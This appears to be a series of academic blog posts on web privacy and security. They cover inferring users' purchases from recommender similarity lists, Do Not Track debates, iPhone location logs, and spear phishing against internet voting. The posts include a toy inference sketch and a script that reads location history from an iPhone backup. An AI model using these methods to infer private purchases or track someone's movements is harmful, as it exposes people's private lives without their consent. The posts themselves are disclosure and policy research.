To help users find items of interest, sites routinely recommend items similar to a given item. For example, product pages on Amazon contain a "Customers Who Bought This Item Also Bought" list. These recommendations are typically public, and they are the product of patterns learned from all users of the system. If customers often purchase both item A and item B, a collaborative filtering system will judge them to be highly similar. Most sites generate ordered lists of similar items for any given item, but some also provide numeric similarity scores.
Although item similarity is only indirectly related to individual transactions, we determined that temporal changes in item similarity lists or scores can reveal details of those transactions. If you're a Mozart fan and you listen to a Justin Bieber song, this choice increases the perceived similarity between Justin Bieber and Mozart. Because similarity lists and scores are based on perceived similarity, your action may result in changes to these scores or lists.
Suppose that an attacker knows some of your past purchases on a site: for example, past item reviews, social networking profiles, or real-world interactions are a rich source of information. New purchases will affect the perceived similarity between the new items and your past purchases, possibly causing visible changes to the recommendations provided for your previously purchased items. We demonstrate that an attacker can leverage these observable changes to infer your purchases. Among other things, these attacks are complicated by the fact that multiple users interact with a system simultaneously and that updates do not immediately follow a transaction.
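To illustrate the mechanism with toy numbers, here is a small Python sketch. The data, the items, and the cosine-similarity measure are stand-ins rather than any particular site's algorithm; real systems use much larger matrices, different similarity measures, and delayed updates, which is part of what complicates the attack in practice.

```python
import numpy as np

def item_similarity(matrix, a, b):
    """Cosine similarity between two item columns of a 0/1 user-item matrix."""
    va, vb = matrix[:, a], matrix[:, b]
    denom = np.linalg.norm(va) * np.linalg.norm(vb)
    return 0.0 if denom == 0 else float(va @ vb) / denom

# Toy data: rows are users, columns are items.
# Item 0 = a Mozart album, item 1 = a Justin Bieber song, item 2 = something else.
purchases = np.array([
    [1, 0, 1],
    [1, 0, 0],
    [0, 1, 1],
    [1, 0, 0],   # the target user, known to be a Mozart fan
])

before = item_similarity(purchases, 0, 1)
purchases[3, 1] = 1   # the target user now listens to the Bieber song
after = item_similarity(purchases, 0, 1)

# The public Mozart/Bieber similarity score moved because of one user's action;
# an observer who knows the target's Mozart purchase can exploit such shifts.
print(round(before, 3), "->", round(after, 3))   # 0.0 -> 0.408
```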
To evaluate our attacks, we use data from Hunch, LibraryThing, Last.fm, and Amazon. Our goal is not to claim privacy flaws in these specific sites (in fact, we often use data voluntarily disclosed by their users to verify our inferences), but to demonstrate the general feasibility of inferring individual transactions from the outputs of collaborative filtering systems. Among their many differences, these sites vary dramatically in the information that they reveal. For example, Hunch reveals raw item-to-item correlation scores, but Amazon reveals only lists of similar items. In addition, we examine a simulated system created using the Netflix Prize dataset. Our paper outlines the experimental results.
While inference of a Justin Bieber interest may be innocuous, inferences could expose anything from dissatisfaction with a job to health issues. Our attacks assume that a victim reveals certain past transactions, but users may publicly reveal certain transactions while preferring to keep others private. Ultimately, users are best equipped to determine which transactions would be embarrassing or otherwise problematic. We demonstrate that the public outputs of recommender systems can reveal transactions without user knowledge or consent.
Unfortunately, existing privacy technologies appear inadequate here, failing to simultaneously guarantee acceptable recommendation quality and user privacy. Mitigation strategies are a rich area for future work, and we hope to work towards solutions with others in the community.
Worth noting is that this work suggests a risk posed by any feature that adapts in response to potentially sensitive user actions. Unless sites explicitly consider the data exposed, such features may inadvertently leak details of these underlying actions.
Our paper contains additional details. This work was presented earlier today at the 2011 IEEE Symposium on Security and Privacy. Arvind has also blogged about this work.
This guest post is from Nick Doty, of the W3C and UC Berkeley School of Information. As a companion post to my summary of the position papers submitted for last month's W3C Do-Not-Track Workshop, hosted by CITP, Nick goes deeper into the substance and interaction during the workshop.
The level of interest and participation in last month's Workshop on Web Tracking and User Privacy — about a hundred attendees spanning multiple countries, dozens of companies, a wide variety of backgrounds — confirms the broad interest in Do Not Track. The relatively straightforward technical approach with a catchy name has led to, in the US, proposed legislation at both the state and federal level and specific mention by the Federal Trade Commission (it was nice to have Ed Felten back from DC representing his new employer at the workshop), and comparatively rapid deployment of competing proposals by browser vendors. Still, one might be surprised that so many players are devoting such engineering resources to a relatively narrow goal: building technical means that allow users to avoid tracking across the Web for the purpose of compiling behavioral profiles for targeted advertising.
In fact, Do Not Track (in all its variations and competing proposals) is the latest test case for how new online technologies will address privacy issues. What mix of minimization techniques (where one might classify Microsoft's Tracking Protection block lists) versus preference expression and use limitation (like a Do Not Track header) will best protect privacy and allow for innovation? Can parties agree on a machine-readable expression of privacy preferences (as has been heavily debated in P3P, GeoPriv and other standards work), and if so, how will terms be defined and compliance monitored and enforced? Many attendees were at the workshop not just to address this particular privacy problem — ubiquitous invisible tracking of Web requests to build behavioral profiles — but to grab a seat at the table where the future of how privacy is handled on the Web may be decided. The W3C, for its part, expects to start an Interest Group to monitor privacy on the Web and spin out specific work as new privacy issues inevitably arise, in addition to considering a Working Group to address this particular topic (more below). The Internet Engineering Task Force (IETF) is exploring a Privacy Directorate to provide guidance on privacy considerations across specs.
At a higher level, this debate presents a test case for the process of building consensus and developing standards around technologies like tracking protection or Do Not Track that have inspired controversy. What body (or rather, combination of bodies) can legitimately define preference expressions that must operate at multiple levels in the Web stack, not to mention serve the diverse needs of individuals and entities across the globe? Can the same organization that defines the technical design also negotiate semantic agreement between very diverse groups on the meaning of "tracking"? Is this an appropriate role for technical standards bodies to assume? To what extent can technical groups work with policymakers to build solutions that can be enforced by self-regulatory or governmental players?
Discussion at the recent workshop confirmed many of these complexities: though the agenda was organized to roughly separate user experience, technical granularity, enforcement and standardization, overlap was common and inevitable. Proposals for an "ack" or response header brought up questions of whether the opportunity to disclaim following the preference would prevent legal enforcement; whether not having such a response would leave users confused about when they had opted back in; and how granular such header responses should be. In defining first vs. third party tracking, user expectations, current Web business models and even the same-origin security policy could point the group in different directions.
We did see some moments of consensus. There was general agreement that while user interface issues were key to privacy, trying to standardize those elements was probably counterproductive but providing guidance could help significantly. Regarding the scope of "tracking", the group was roughly evenly divided on what they would most prefer: a broad definition (any logging), a narrow definition (online behavioral advertising profiling only) or something in between (where tracking is more than OBA but excludes things like analytics or fraud protection, as in the proposal from the Center for Democracy and Technology). But in a "hum" to see which proposals workshop attendees opposed ("non-starters") no one objected to starting with a CDT-style middle ground — a rather shocking level of agreement to end two days chock full of debate.
For tech policy nerds, then, this intimate workshop about a couple of narrow technical proposals was heady stuff. And the points of agreement suggest that real interoperable progress on tracking protection — the kind that will help the average end user's privacy — is on the way. For the W3C, this will certainly be a topic of discussion at the ongoing meeting in Bilbao, and we're beginning detailed conversations about the scope and milestones for a Working Group to undertake technical standards work.
Thanks again to Princeton/CITP for hosting the event, and to Thomas and Lorrie for organizing it: bringing together this diverse group of people on short notice was a real challenge, and it paid off for all of us. If you'd like to see more primary materials: minutes from the workshop (including presentations and discussions) are available, as are the position papers and slides. And the W3C will post a workshop report with a more detailed summary very soon.
As reported in Fast Company, RichRelevance and Overstock.com teamed up to offer up to a $1,000,000 prize for improving "its recommendation engine by 10 percent or more."
If You Liked Netflix, You Might Also Like Overstock
When I first read a summary of this contest, it appeared they were following in Netflix's footsteps right down to releasing user data sans names. This did not end well for Netflix's users or for Netflix. Narayanan and Shmatikov were able to re-identify Netflix users using the contest dataset, and their research contributed greatly to Ohm's work on de-anonymization. After running the contest a second time, Netflix terminated it early in the face of FTC attention and a lawsuit that it settled out of court.
This time, Overstock is providing "synthetic data" to contest entrants, then testing submitted algorithms against unreleased real data. Tag line: "If you can't bring the data to the code, bring the code to the data." Hmm. An interesting idea, but still short on details about the sharp edges that concern me most. I look forward to finding the time to play with the system and dataset. The good news is seeing companies recognize privacy concerns and respond with something interesting and new. That is, at least, a move in the right direction.
Place your bets now on which happens first: a contest winner with a 10% boost to sales, or researchers finding ways to re-identify at least 10% of the data?
There's more than a hint of theatrics in the draft PROTECT IP bill (pdf, via dontcensortheinternet ) that has emerged as son-of-COICA, starting with the ungainly acronym of a name. Given its roots in the entertainment industry, that low drama comes as no surprise. Each section name is worse than the last: "Eliminating the Financial Incentive to Steal Intellectual Property Online" (Sec. 4) gives way to "Voluntary action for Taking Action Against Websites Stealing American Intellectual Property" (Sec. 5).
Techdirt gives a good overview of the bill, so I'll just pick some details (diff): the text replaces "nondomestic domain" with "domain" and permits private plaintiffs -- "a holder of an intellectual property right harmed by the activities of an Internet site dedicated to infringing activities occurring on that Internet site." Oddly, the statute doesn't say the simpler "one whose rights are infringed," so the definition must be broader. Could a movie studio claim to be hurt by the infringement of others' rights, or the MPAA enforce on behalf of all its members? (Sec. 4 is also missing a (d)(2)(D).) In short, rather than "protecting" intellectual and creative industry, this bill would make it less secure, giving the U.S. a competitive disadvantage in online business. (Sorry, Harlan, that we still can't debug the US Code as true code.)
Not satisfied with seizing domain names, the Department of Homeland Security asked Mozilla to take down the MafiaaFire add-on for Firefox. Mozilla, through its legal counsel Harvey Anderson, refused. Mozilla deserves thanks and credit for a principled stand for its users' rights.
MafiaaFire is a quick plugin, as its author describes, providing redirection service for a list of domains: "We plan to maintain a list of URLs, and their duplicate sites (for example Demoniod.com and Demoniod.de) and painlessly redirect you to the correct site." The service provides redundancy, so that domain resolution -- especially at a registry in the United States -- isn't a single point of failure between a website and its would-be visitors. After several rounds of ICE seizure of domain names on allegations of copyright infringement -- many of which have been questioned as to both procedural validity and effectiveness -- redundancy is a sensible precaution for site-owners who are well within the law as well as those pushing its limits.
DHS seemed poised to repeat those procedural errors here. As Mozilla's Anderson blogged: "Our approach is to comply with valid court orders, warrants, and legal mandates, but in this case there was no such court order." DHS simply "requested" the takedown with no such procedural back-up. Instead of pulling the add-on, Anderson responded with a set of questions, including:
- Have any courts determined that MAFIAAfire.com is unlawful or illegal in any way? If so, on what basis? (Please provide any relevant rulings)
- Have any courts determined that the seized domains related to MAFIAAfire.com are unlawful, illegal or liable for infringement in any way? (please provide relevant rulings)
- Is Mozilla legally obligated to disable the add-on or is this request based on other reasons? If other reasons, can you please specify.
Unless and until the government can explain its authority for takedown of code, Mozilla is right to resist DHS demands. Mozilla's hosting of add-ons, and the Firefox browser itself, facilitate speech. They, like the domain name system registries ICE targeted earlier, are sometimes intermediaries necessary to users' communication. While these private actors do not have First Amendment obligations toward us, their users, we rely on them to assert our rights (and we suffer when some, like Facebook, are less vigilant guardians of speech).
As Congress continues to discuss the ill-considered COICA, it should take note of the problems domain takedowns are already causing. Kudos to Mozilla for bringing these latest errors to public attention -- and, as Tom Lowenthal suggests in the do-not-track context, standing up for its users.
cross-posted at Legal Tags
Last week, we hosted the W3C "Web Tracking and User Privacy" Workshop here at CITP (sponsored by Adobe, Yahoo!, Google, Mozilla and Microsoft). If you were not able to join us for this event, I hope to summarize some of the discussion embodied in the roughly 60 position papers submitted.
The workshop attracted a wide range of participants; the agenda included advocates, academics, government, start-ups and established industry players from various sectors. Despite the broad name of the workshop, the discussion centered around "Do Not Track" (DNT) technologies and policy, essentially ways of ensuring that people have control, to some degree, over web profiling and tracking.
Unfortunately, I'm going to have to expect that you are familiar with the various proposals before going much further, as the workshop position papers are necessarily short and assume familiarity. (If you are new to this area, the CDT's Alissa Cooper has a brief blog post from this past March, "Digging in on 'Do Not Track'", that mentions many of the discussion points. Technically, much of the discussion involved the mechanisms of the Mayer, Narayanan and Stamm IETF Internet-Draft from March and the Microsoft W3C member submission from February.)
Read on for more...
Technical Implementation: First, some quick background and updates: A number of papers point out how analogizing to a Do-Not-Call-like registry--I suppose where netizens would sign up not to be tracked--would not work in the online tracking sense, so we should be careful not to shape the technology and policy too closely to Do-Not-Call. Having recognized that, the current technical proposals center around the Microsoft W3C submission and the Mayer et al. IETF submission, including some mix of a DNT HTTP header, a DNT DOM flag, and Tracking Protection Lists (TPLs). While the IETF submission focuses exclusively on the DNT HTTP header, the W3C submission includes all three of these technologies. Browsers are moving pretty quickly here: Mozilla's Firefox 4.0 browser includes the DNT header, Microsoft's IE9 includes all three of these capabilities, Google's Chrome browser now allows extensions to send the DNT header through the WebRequest API, and Apple has announced that the next version of its Safari browser will support the DNT header.
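For readers who haven't looked at the mechanics, the header proposals really are this simple on the wire. A minimal sketch in Python 2 (the URL is a placeholder), roughly equivalent to what a DNT-enabled browser attaches to every request:

import urllib2

# An ordinary HTTP request carrying the Do Not Track preference.
# 'DNT: 1' is the header used by the header-based proposals; whether and
# how a server honors it is exactly what the definitions and enforcement
# debate is about.
request = urllib2.Request('http://www.example.com/', headers={'DNT': '1'})
response = urllib2.urlopen(request)
print response.getcode()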
Some of the papers critique certain aspects of the three implementation options while some suggest other mechanisms entirely. CITP's Harlan Yu includes an interesting discussion of the problems with DOM flag granularity and access control problems when third-party code included in a first-party site runs as if it were first-party code. Toubiana and Nissenbaum talk about a number of problems with the persistence of DNT exceptions (where a user opts back in) when a resource changes content or ownership, and then go on to suggest profile-based opting-back-in based on a "topic" or grouping of websites. Avaya's submission has a fascinating discussion of the problems with implementation of DNT within enterprise environments, where tracking-like mechanisms are used to make sure people are doing their jobs across disparate enterprise web-services; Avaya proposes a clever solution where the browser first checks to see if it can reach a resource only available internally to the enterprise (virtual) network, in which case it ignores DNT preferences for enterprise software tracking mechanisms. A slew of submissions from Aquin et al., Azigo and PDECC favor a culture of "self-tracking", allowing and teaching people to know more about the digital traces they leave and giving them (or their agents) control over the use and release of their personal information. CASRO-ESOMAR and Apple have interesting discussions of gaming TPLs: CASRO-ESOMAR points out that a competitor could require a user to accept a TPL that blocks traffic from its competitors, and Apple talks about spam-like DNS cycling as an example of an "arms race" response against TPLs.
Definitions: Many of the papers addressed definitions definitions definitions... mostly about what "tracking" means and what terms like "third-party" should mean. Many industry submissions such as Paypal, Adobe, SIIA, and Google urge caution so that good types of "tracking", such as analytics and forensics, are not swept under the rug, and further argue that clear definitions of the terms involved in DNT are crucial to avoid disrupting user expectations, innovation and the online ecosystem. Paypal points out, as have others, that domain names are not good indicators of third-party status (e.g., metrics.apple.com is the Adobe Omniture service for apple.com, and fb.com is equivalent to facebook.com). Ashkan Soltani's submission distinguishes definitions for DNT that are a "do not use" conception vs. a "do not collect" conception, and argues for a solution that "does not identify", requiring the removal of any unique identifiers associated with the data. Soltani points out that this has interesting measurement/enforcement properties: if a user sees a unique ID in the do-not-identify case, the site is doing it wrong.
Enforcement: Some raised the issue of enforcement; Mozilla, for example, wants to make sure that there are reasonable enforcement mechanisms to deal with entities that ignore DNT mechanisms. On the other side, so to speak, are those calling for self-regulation, such as Comcast and SIIA, as opposed to those advocating explicit regulation. The opinion polling research groups, CASRO-ESOMAR, call explicitly for regulation no matter what DNT mechanism is ultimately adopted, such that DNT header requests are clearly enforced or that TPLs are regulated tightly so as not to over-block legitimate research activities. Abine wants a cooperative market mechanism that results in a "healthy market system that is responsive to consumer outcome metrics" and that incentivizes advertising companies to work with privacy solution providers to increase consumer awareness and transparency around online tracking. Many of the industry players worried about definitions are also worried about over-prescription from a regulatory perspective; e.g., Datran Media is concerned about over-prescription via regulation that might stifle innovation in new business models. Hoofnagle et al. are evaluating the effectiveness of self-regulation, and find that the self-regulation programs currently in existence are heavily tilted in favor of industry and do not adequately embody consumer conceptions of privacy and tracking.
Research: There were a number of submissions addressing research that is ongoing and/or further needed to gauge various aspects of the DNT puzzle. The submissions from McDonald and Wang et al. describe user studies focusing, respectively, on what consumers expect from DNT--spoiler: they expect no collection of their data--and gauging the usability and effectiveness of current opt-out tools. Both of these lines of work argue for usable mechanisms that communicate how developers implement/envision DNT and how users can best express their preferences via these tools. NIST's submission argues for empirical studies to set objective and usable standards for tracking protection and describes a current study of single sign-on (SSO) implementations. Thaw et al. discuss a proposal for incentivizing developers to communicate and design the various levels of rich data they need to perform certain kinds of ad targeting, and then use a multi-armed bandit model to illustrate game-theoretic ad targeting that can be tweaked based on how much data they are allowed to collect. Finally, CASRO-ESOMAR makes a plea for exempting legitimate research purposes from DNT, so that opinion polling and academic research can avoid bias.
Transparency: A particularly fascinating thread of commentary to me was the extent to which submissions touched on or entirely focused on issues of transparency in tracking. Grossklags argues that DNT efforts will spark increased transparency but is not sure that will overcome some common consumer privacy barriers seen in research. Seltzer talks about the intimate relationship between transparency and privacy and concludes that a DNT header is not very transparent--in operation, not use--while TPLs are more transparent in that they are a user-side mechanism that users can inspect, change and verify correct operation. Google argues that there is a need for transparency in "what data is collected and how it is used", leaving out users' ability to affect or control these things. In contrast, BlueKai also advocates for transparency in the sense of both accessing a user's profile and user "control" over the data it collects, but it doesn't and probably cannot extend this transparency to an understanding of how BlueKai's clients use this data. Datran Media describes their PreferenceCentral tool, which allows opting out of brands the user doesn't want targeting them (instead of ad networks, with which people are not familiar); they argue this is granular enough to avoid the "creepy" targeting feeling that users get from behavioral ads while still allowing high-value targeted advertising. Evidon analogizes to physical-world shopping transactions and concludes, smartly: "Anytime data that was not explicitly provided is explicitly used, there is a reflexive notion of privacy violation." and "A permanently affixed 'Not Me' sign is not a representation of an engaged, meaningful choice."
W3C vs. IETF: Finally, Mozilla seems to be the only submission that wrestles a bit with the "which standards-body?" question: W3C, IETF or some mix of both? They point out that the DNT Header is a broader issue than just web browsing so should be properly tackled by IETF where HTTP resides and the W3C effort could be focused on TPLs with a subcommittee for the DNT DOM element.
Finally, here are a bunch of submissions that don't fit into the above categories that caught my eye:
Soghoian argues that the quantity and quality of information needed for security, law enforcement and fraud prevention is usually so great that it risks becoming the exception that swallows the rule. Soghoian further recommends a total kibosh on certain nefarious technologies such as browser fingerprinting.
Lowenthal makes the very good point that browser vendors need to get more serious about managing security and privacy vulnerabilities, as that kind of risk is best dealt with at the choke-point of the browsers that users choose, rather than across the myriad of possible web entities. This would also let browsers compete on how privacy-preserving they can be.
Mayer argues for a "generative" approach to a privacy choice signaling technology, highlighting that language preferences (via short codes) and browsing platform (via user-agent strings) are now sent as preferences in web requests and web sites are free to respond as they see fit. A DNT signaling mechanism like this would allow for great flexibility in how a web service responded to a DNT request, for example serving a DNT version of the site/resource, prompting the user for their preferences or asking for a payment before serving.
Yahoo points out that DNT will take a while to make it into the majority of browsers that users are using. They suggest a hybrid approach using the DAA CLEAR ad notice for backwards compatibility for browsers that don't support DNT mechanisms and the DNT header for an opt-out that is persistent and enforceable.
Whew; I likely left out a lot of good stuff across the remaining submissions, but I hope that readers get an idea of some of the issues in play and can consult the submissions they find particularly interesting as this develops. We hope to have someone pen a "part 2" to this entry describing the discussion during the workshop and what the next steps in DNT will be.
This afternoon the CA Senate Judiciary Committee had a brief time for proponents and opponents of SB 761 to speak about CA's Do Not Track legislation. In general, the usual people said the usual things, with a few surprises along the way.
Surprise 1: repeated discussion of privacy as a Constitutional right. For those of us accustomed to privacy at the federal level, it was a good reminder that CA is a little different.
Surprise 2: TechNet compared limits on Internet tracking to Texas banning oil drilling, and claimed DNT is "not necessary" so legislation would be "particularly bad." Is Kleiner still heavily involved in the post-Wade TechNet?
Surprise 3: the Chamber of Commerce estimated that DNT legislation would cost $4 billion in California, extrapolated from an MIT/Toronto study in the EU. Presumably they mean Goldfarb & Tucker's Privacy Regulation and Online Advertising, which is in my queue to read. Comments on donottrack.us raise concerns. Assuming even a generous opt-out rate of 5% of CA Internet users, $4B sounds high compared with other estimates that value a user's entire clickstream at around $5/month. I look forward to reading their paper, and to learning the Chamber's method of estimating CA costs based on Europe.
Surprise 4: hearing about the problems of a chilling effect -- for job growth, not for online use due to privacy concerns. Similarly, hearing frustrations about a text that says something "might" or "may" happen, with no idea what will actually transpire -- about the text of the bill, not about the text of privacy policies.
On a 3 to 2 vote, they sent the bill to the next phase: the Appropriations Committee. Today's vote was an interesting start.
Today, Pete Warden and Alasdair Allan revealed that Apple’s iPhone maintains an apparently indefinite log of its location history. To show the data available, they produced and demoed an application called iPhone Tracker for plotting these locations on a map. The application allows you to replay your movements, displaying your precise location at any point in time when you had your phone. Their open-source application works with the GSM (AT&T) version of the iPhone, but I added changes to their code that allow it to work with the CDMA (Verizon) version of the phone as well.
When you sync your iPhone with your computer, iTunes automatically creates a complete backup of the phone on your machine. This backup contains any new content, contacts, and applications that were modified or downloaded since your last sync. Beginning with iOS 4, this backup also includes a SQLite database containing tables named ‘CellLocation’, ‘CdmaCellLocaton’ and ‘WifiLocation’. These correspond to the GSM, CDMA and WiFi variants of location information. Each of these tables contains latitude and longitude data along with timestamps. These tables also contain additional fields that appear largely unused on the CDMA iPhone that I used for testing -- including altitude, speed, confidence, “HorizontalAccuracy,” and “VerticalAccuracy.”
Interestingly, the WifiLocation table contains the MAC address of each WiFi network node you have connected to, along with an estimated latitude/longitude. The WifiLocation table in our two-month old CDMA iPhone contains over 53,000 distinct MAC addresses, suggesting that this data is stored not just for networks your device connects to but for every network your phone was aware of (i.e. the network at the Starbucks you walked by -- but didn’t connect to).
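If you want to poke at the data yourself, here is a minimal sketch using Python's sqlite3 module. The file name, table name and column names below are assumptions based on what we observed and may differ across devices and iOS versions; it also assumes you have already copied the location database out of the iTunes backup into your working directory.

import sqlite3

# Assumed names: consolidated.db, table CellLocation, columns Timestamp,
# Latitude, Longitude. Treat these as assumptions for your own device.
conn = sqlite3.connect('consolidated.db')
cursor = conn.cursor()
cursor.execute("SELECT Timestamp, Latitude, Longitude FROM CellLocation "
               "ORDER BY Timestamp DESC LIMIT 10")
for timestamp, latitude, longitude in cursor.fetchall():
    print timestamp, latitude, longitude
conn.close()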
Location information persists across devices, including upgrades from the iPhone 3GS to iPhone 4, which appears to be a function of the migration process. It is important to note that you must have physical access to the synced machine (i.e. your laptop) in order to access the synced location logs. Malicious code running on the iPhone presumably could also access this data.
Not only was it unclear that the iPhone is storing this data, but the rationale behind storing it remains a mystery. To the best of my knowledge, Apple has not disclosed that this type or quantity of information is being stored. Although Apple does not appear to be currently using this information, we’re curious about the rationale for storing it. In theory, Apple could combine WiFi MAC addresses and GPS locations, creating a highly accurate geolocation service.
The exact implications for mobile security (along with forensics and law enforcement) will be important to watch. What is most surprising is that this granularity of information is being stored at such a large scale on such a mainstream device.
Oak Ridge National Labs (one of the US national energy labs, along with Sandia, Livermore, Los Alamos, etc) had a bunch of people fall for a spear phishing attack (see articles in Computerworld and many other descriptions). For those not familiar with the term, spear phishing is sending targeted emails at specific recipients, designed to have them do an action (e.g., click on a link) that will install some form of software (e.g., to allow stealing information from their computers). This is distinct from spam, where the goal is primarily to get you to purchase pharmaceuticals, or maybe install software, but in any case is widespread and not targeted at particular victims. Spear phishing is the same technique used in the Google Aurora (and related) cases last year, the RSA case earlier this year, Epsilon a few weeks ago, and doubtless many others that we haven't heard about. Targets of spear phishing might be particular people within an organization (e.g., executives, or people on a particular project).
In this posting, I’m going to connect this attack to Internet voting (i-voting), by which I mean casting a ballot from the comfort of your home using your personal computer (i.e., not a dedicated machine in a precinct or government office). My contention is that in addition to all the other risks of i-voting, one of the problems is that people will click links targeted at them by political parties, and will try to cast their vote on fake web sites. The scenario is that operatives of the Orange party send messages to voters who belong to the Purple party claiming to be from the Purple party’s candidate for president and giving a link to a look-alike web site for i-voting, encouraging voters to cast their votes early. The goal of the Orange party is to either prevent Purple voters from voting at all, or to convince them that their vote has been cast and then use their credentials (i.e., username and password) to have software cast their vote for Orange candidates, without the voter ever knowing.
The percentage of users who fall prey to targeted attacks has been a subject of some controversy. While the percentage of users who click on spam emails has fallen significantly over the years as more people are aware of them (and as spam filtering has improved and mail programs no longer fetch images by default), spear phishing attacks have been assumed to be more effective. The result from Oak Ridge is one of the most significant pieces of hard data in that regard.
According to an article in The Register, of the 530 Oak Ridge employees who received the spear phishing email, 57 fell for the attack by clicking on a link (which silently installed software on their computers using a security vulnerability in Internet Explorer that was patched earlier this week – but presumably the patch wasn’t installed yet on their computers). Oak Ridge employees are likely to be well-educated scientists (but not necessarily computer scientists) - and hence not representative of the population as a whole. The fact that this was a spear phishing attack means that it was probably targeted at people with access to sensitive information, whether administrative staff, senior scientists, or executives (but probably not the person running the cafeteria, for example). Whether the level of education and access to sensitive information makes them more or less likely to click on links is something for social scientists to assess – I’m going to take it as a data point and assume a range of 5% to 20% of victims will click on a link in a spear phishing attack (i.e., that it’s not off by more than a factor of two).
So as a working hypothesis based on this actual result, I propose that a spear phishing attack designed to draw voters to a fake web site to cast their votes will succeed with 5-20% of the targeted voters. With UOCAVA (military and overseas voters) representing around 5% of the electorate, I propose that a target of impacting 0.25% to 1% of the votes is not an unreasonable assumption. Now if we presume that the race is close and half of them would have voted for the "preferred" candidate anyway, this allows a spear phishing attack to capture an additional 0.12% to 0.50% of the vote.
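For those who want to check the arithmetic, here is a small back-of-the-envelope script; the click rates and the UOCAVA share are the assumptions stated above, not measured values.

# Back-of-the-envelope check of the numbers above.
uocava_share = 0.05                 # UOCAVA voters as a fraction of the electorate
for click_rate in (0.05, 0.20):     # assumed spear phishing success rates
    affected = click_rate * uocava_share
    net_swing = affected / 2.0      # half would have voted that way anyway
    print "click rate %2d%%: affected %.2f%% of votes, net swing %.2f%%" % (
        click_rate * 100, affected * 100, net_swing * 100)
# 5%  -> affected 0.25% of votes, net swing 0.12%
# 20% -> affected 1.00% of votes, net swing 0.50%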
If i-voting were to become more widespread – for example, to be available to any absentee voter – then these numbers double, because absentee voters are typically 10% of all voters. If i-voting becomes available to all voters, then we can guess that 5% to 20% of ALL votes can be coerced this way. At that point, we might as well give up elections, and go to coin tossing.
Considering the vast sums spent on advertising to influence voters, even for the very limited UOCAVA population, spear phishing seems like a very worthwhile investment for a candidate in a close race.
I’ve made various updates to my list of The Most Important Software Innovations. I’ve added Distributed Version Control System (DVCS); these are all over now in the form of git, Mercurial (hg), Bazaar, Monotone, and so on, but these were influenced by the earlier BitKeeper, which was in turn influenced by the earlier Teamware (developed by Sun starting in 1991). As is often the case, “new” innovations are actually much older than people realize. I also added make, originally developed in 1977, and quicksort, developed in 1960-1961 by C.A.R. (Tony) Hoare. I’ve also improved lots of material that was already there, such as a better description of the history of the remote procedure call (RPC).
So please enjoy The Most Important Software Innovations!
In its latest 2011 budget proposal, Congress makes deep cuts to the Electronic Government Fund. This fund supports the continued development and upkeep of several key open government websites, including Data.gov, USASpending.gov and the IT Dashboard. An earlier proposal would have cut the funding from $34 million to $2 million this year, although the current proposal would allocate $17 million to the fund.
Reports say that major cuts to the e-government fund would force OMB to shut down these transparency sites. This would strike a significant blow to the open government movement, and I think it’s important to emphasize exactly why shuttering a site like Data.gov would be so detrimental to transparency.
On its face, Data.gov is a useful catalog. It helps people find the datasets that government has made available to the public. But the catalog is really a convenience that doesn’t necessarily need to be provided by the government itself. Since the vast majority of datasets are hosted on individual agency servers—not directly by Data.gov—private developers could potentially replicate the catalog with only a small amount of effort. So even if Data.gov goes offline, nearly all of the data still exist online, and a private developer could go rebuild a version of the catalog, maybe with even better features and interfaces.
But Data.gov also plays a crucial behind the scenes role, setting standards for open data and helping individual departments and agencies live up to those standards. Data.gov establishes a standard, cross-agency process for publishing raw datasets. The program gives agencies clear guidance on the mechanics and requirements for releasing each new dataset online.
There’s a Data.gov manual that formally documents and teaches this process. Each agency has a lead Data.gov point-of-contact, who’s responsible for identifying publishable datasets and for ensuring that when data is published, it meets information quality guidelines. Each dataset needs to be published with a well-defined set of common metadata fields, so that it can be organized and searched. Moreover, thanks to Data.gov, all the data is funneled through at least five stages of intermediate review—including national security and privacy reviews—before final approval and publication. That process isn’t quick, but it does help ensure that key goals are satisfied.
When agency staff have data they want to publish, they use a special part of the Data.gov website, which outside users never see, called the Data Management System (DMS). This back-end administrative interface allows agency points-of-contact to efficiently coordinate publishing activities agency-wide, and it gives individual data stewards a way to easily upload, view and maintain their own datasets.
My main concern is that this invaluable but underappreciated infrastructure will be lost when IT systems are de-funded. The individual roles and responsibilities, the informal norms and pressures, and perhaps even the tacit authority to put new datasets online would likely also disappear. The loss of structure would probably mean that sharply reduced amounts of data will be put online in the future. The datasets that do get published in an ad hoc way would likely lack the uniformity and quality that the current process creates.
Releasing a new dataset online is already a difficult task for many agencies. While the current standards and processes may be far from perfect, Data.gov provides agencies with a firm footing on which they can base their transparency efforts. I don’t know how much funding is necessary to maintain these critical back-end processes, but whatever Congress decides, it should budget sufficient funds—and direct that they be used—to preserve these critically important tools.
I’ve been reading over an old court case and thinking about how it relates to the issue of government releasing free / libre / open source software (FLOSS). The case is Charles River Bridge v. Warren Bridge, 36 U.S. 420, including the final U.S. Supreme Court decision (United States Supreme Court reports, Vol. 9 (PDF page 773 on)). This is old; the decision was rendered in 1837. But I think it has interesting ramifications for today.
Any lawyer will correctly tell you that you must not look at one court decision to answer a specific question. And any lawyer will tell you that the details matter; a case with different facts may have a different ruling. Fine. I’m not a lawyer anyway, and I am not trying to create a formal legal opinion (this is a blog, not a legal opinion!). But still, it’s useful to look at these pivotal cases and try to think about their wider implications. I think we should all think about what’s good (or not good) for our communities, and how we should help our governments enable that; that is not a domain exclusive to lawyers.
So, what was this case all about? Wikipedia has a nice summary. Basically, in 1785 the Charles River Bridge Company was granted a charter to construct a bridge over the Charles River between Boston and Charleston. The bridge owners got quite wealthy from the bridge tolls, but the public was not so happy with having to keep paying and paying for such a key service. So Massachusetts allowed another company to build another bridge, the Warren bridge, next to the original Charles River bridge. What’s more, this second agreement stipulated that the Warren bridge would, after a certain time, be turned over to the state and be free for the public to use. The Charles River bridge owners were enraged — they knew that a free-to-use bridge would eliminate their profits. So they sued.
As noted in Wikipedia, the majority decision (read by Taney) was that any charter contract should be interpreted as narrowly as possible. Since the Charles River Bridge contract did not explicitly guarantee exclusive rights, the Supreme Court held that they didn’t get exclusive rights. The Supreme Court also determined that, in general, public grants should be interpreted closely and if there is ever any uncertainty in a contract, the decision made should be one to better the public. Taney said, “While the rights of private property are sacredly guarded, we must not forget that the community also have rights, and that the happiness and well-being of every citizen depends on their faithful preservation.” In his remarks, Taney also explored what the negative effects on the country would be if the Court had sided with the Charles River Bridge Company. He stated that had that been the decision of the Court, transportation would be affected around the whole country. Taney made the point that with the rise of technology, canals and railroads had started to take away business from highways, and if charters granted monopolies to corporations, then these sorts of transportation improvements would not be able to flourish. If this were the case then, Taney said, the country would “be thrown back to the improvements of the last century, and obliged to stand still.”
